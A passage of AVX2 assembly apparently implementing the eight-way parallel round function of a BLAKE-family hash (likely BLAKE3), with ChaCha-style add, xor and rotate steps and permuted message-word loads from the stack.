vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0xC0]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x140]
vpaddd ymm2, ymm2, ymmword ptr [rsp]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x1A0]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x20]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x180]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x120]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x1E0]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x160]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0xA0]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x1C0]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x100]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x60]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x140]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x1A0]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0xE0]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x80]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x180]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x40]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x1C0]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0xC0]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x120]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x160]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x100]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0xA0]
vpaddd ymm1, ymm1, ymmword ptr [rsp]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x1E0]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x20]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x140]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x180]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x1C0]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x1A0]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0xE0]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x120]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x60]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x1E0]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x80]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x160]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0xA0]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x20]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x40]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x100]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0xC0]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x180]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x120]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x1E0]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x1C0]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x1A0]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x160]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x140]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x100]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0xE0]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0xA0]
vpaddd ymm2, ymm2, ymmword ptr [rsp]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0xC0]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x40]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x60]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x20]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x80]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x120]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x160]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x100]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x1E0]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x1C0]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0xA0]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x180]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x20]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x1A0]
vpaddd ymm1, ymm1, ymmword ptr [rsp]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x40]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x80]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
